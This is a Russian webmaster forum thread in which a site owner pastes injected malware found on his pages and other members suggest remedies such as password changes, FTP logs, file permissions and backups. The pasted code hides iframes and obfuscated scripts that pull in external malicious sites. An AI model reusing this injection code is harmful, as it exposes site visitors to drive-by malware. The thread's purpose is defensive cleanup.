Форум Сайтостроение Веб-строительство

Вирусы на сайте

livelink
На сайте с 30.04.2006
Offline
117
livelink
964

Друзья, вирусы задрали.. я имею ввиду iframe и т.п...

пару дней назад появилась модификация.. 


<script>var/*BPGnw*/BPGnw/*BPGnw*/=/*BPGnw*/document;function/*BPGnw*/ZptXj(){document.write("<style>.WCgyK{width:0%;height:0%;border:none;}</style>");var/*BPGnw*/xAxOl/*BPGnw*/=/*BPGnw*/"";var/*BPGnw*/meMYu/*BPGnw*/=/*BPGnw*/xAxOl.replace(/[\+x]/g,/*BPGnw*/RVYfo(".6c.6d.74.68.2e.6e.6f.69.74.61.6d.72.6f.66.6e.69.2f.75.72.2e.74.69.67.6e.69.64.61.65.72.74.73.61.66.2f.2f.3a.70.74.74.68"));return/*BPGnw*/meMYu;}BPGnw.writeln(ZptXj());function/*BPGnw*/RVYfo(IcKpy){IcKpy/*BPGnw*/=/*BPGnw*/IcKpy.replace(/[\.]/g,/*BPGnw*/"%");IcKpy/*BPGnw*/=/*BPGnw*/unescape(IcKpy);return/*BPGnw*/iFWMP(IcKpy);}function/*BPGnw*/iFWMP(xpUCU){/*BPGnw*/var/*BPGnw*/KkKGB/*BPGnw*/=/*BPGnw*/"",/*BPGnw*/VxlkN/*BPGnw*/=/*BPGnw*/0;for/*BPGnw*/(VxlkN=xpUCU.length-1;VxlkN>=0;VxlkN--){KkKGB/*BPGnw*/+=/*BPGnw*/xpUCU.charAt(VxlkN);}/*BPGnw*/return/*BPGnw*/KkKGB;}</script><html><body bgcolor="#FFFFFF"><iframe src="http://x3y.ru:8080/index.php" width=149 height=146 style="visibility: hidden"></iframe><!-- ad --><script>var/*ORtNi*/ORtNi/*ORtNi*/=/*ORtNi*/document;function/*ORtNi*/subAM(){document.write("<style>.EjINN{width:0%;height:0%;border:none;}</style>");var/*ORtNi*/ixIQn/*ORtNi*/=/*ORtNi*/"";var/*ORtNi*/SNTuD/*ORtNi*/=/*ORtNi*/ixIQn.replace(/[\+x]/g,/*ORtNi*/GhdcO(".6c.6d.74.68.2e.69.61.72.75.6d.61.73.2f.75.72.2e.75.6d.61.73.6e.6f.69.74.61.72.67.2f.2f.3a.70.74.74.68"));return/*ORtNi*/SNTuD;}ORtNi.writeln(subAM());function/*ORtNi*/LYOXs(PCdul){/*ORtNi*/var/*ORtNi*/rOzOy/*ORtNi*/=/*ORtNi*/"",/*ORtNi*/FYTZZ/*ORtNi*/=/*ORtNi*/0;for/*ORtNi*/(FYTZZ=PCdul.length-1;FYTZZ>=0;FYTZZ--){rOzOy/*ORtNi*/+=/*ORtNi*/PCdul.charAt(FYTZZ);}/*ORtNi*/return/*ORtNi*/rOzOy;}function/*ORtNi*/GhdcO(GURjq){GURjq/*ORtNi*/=/*ORtNi*/GURjq.replace(/[\.]/g,/*ORtNi*/"%");GURjq/*ORtNi*/=/*ORtNi*/unescape(GURjq);return/*ORtNi*/LYOXs(GURjq);}</script><!-- /ad --></body></html>

<script language="JavaScript" type="text/javascript">

function getfromDOM(containerid)

{var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";

do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}

while(element1!==container.lastChild)

return content;

}

var ff_b = document.createElement("strong");

ff_b.id = "YuPi55";

ff_b.innerHTML="<b>http://tnx.name/in.cgi?8</b>";

ff_b.style.visibility = "hidden";

document.getElementsByTagName("body")[0].appendChild(ff_b);

var ff_iframe = document.createElement("iframe");

ff_iframe.id = "JeT";

ff_iframe.name = "JeT";

ff_iframe.height=1;

ff_iframe.width=1;

ff_iframe.style.visibility = "hidden";

ff_iframe.src=getfromDOM("YuPi55");

document.getElementsByTagName("body")[0].appendChild(ff_iframe);

</script>

кто как с этим борется?

Знакомства БЕЗ регистрации - http://www.privetka.ru (http://www.privetka.ru), КРЕАТИВНАЯ РЕКЛАМА - http://advertisio.ru (http://advertisio.ru), Каталог автозапчастей - http://aubb.ru (http://aubb.ru)
Master_globus
На сайте с 15.09.2006
Offline
113
Master_globus
#1

Первым делом проверяйте компьютер на вирусы и меняйте пароли от фтп, и не храните их в файловых менеджерах.

Так же юзайте поиск, подобные темы раз пятцот поднимались на форуме.:)

Работаю только с diafan.CMS 4.4.0 (http://cms.diafan.ru/cms576/)
livelink
На сайте с 30.04.2006
Offline
117
livelink
#2
Master_globus:
Первым делом проверяйте компьютер на вирусы и меняйте пароли от фтп, и не храните их в файловых менеджерах.

Комп чистый, пароли сменил. Удалил все записи из FAR.. только вирусы все равно появляются. Может вирус сам размножаться будучи на сервере?

BR
На сайте с 28.06.2008
Offline
75
Brim.ru
#3
livelink:
Комп чистый, пароли сменил.

- откуда такая уверенность? сколько антивирусов и какой свежести использовали?

livelink:
Может вирус сам размножаться будучи на сервере?

- теоретически не исключено, но это должен быть школьный хостинг. Вытребуйте у хостера FTP-лог, и все станет ясно - либо заражают по FTP, либо как-то иначе.

размещение сайтов (http://www.brim.ru)
iren K
На сайте с 28.12.2008
Offline
222
iren K
#4
livelink:
Комп чистый, пароли сменил. Удалил все записи из FAR.. только вирусы все равно появляются. Может вирус сам размножаться будучи на сервере?

проблема не в Вашем компе, и не в ftp менеджере - проблема с хостером + с ВАШИМ БРАУЗЕРОМ - идет банальный перехват сессии: смените на время браузер, чистите куки, долбите хостера на предмет антивируса, ставьте на все index-файлы cmod 444, ну и далее по списку.. )

c уважением Iren
dominatos
На сайте с 18.01.2008
Offline
101
dominatos
#5
livelink:
Комп чистый, пароли сменил. Удалил все записи из FAR.. только вирусы все равно появляются. Может вирус сам размножаться будучи на сервере?

вы сами ответили на свой вопрос.

Если у вас vps и имеется бекап состояния системы до вируса - лучше сохраните важные данные и восстановите контейнер. или просто зачистите все файлы и залейте новый движок сайта.

Услуги хостинга (http://alteron.net) - обращайтесь. Всегда будем рады!
Ord
На сайте с 15.11.2005
Offline
175
Ord
#6

Раньше такая хрень была.

Лечится установкой антивируса хорошего и сменой паролей FTP и SSH

Создаем лучший кулинарный проект, iamcook.ru
ewg777
На сайте с 04.06.2007
Offline
225
ewg777
#7
кто как с этим борется?

http://www.phpclasses.org/browse/package/5625.html

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий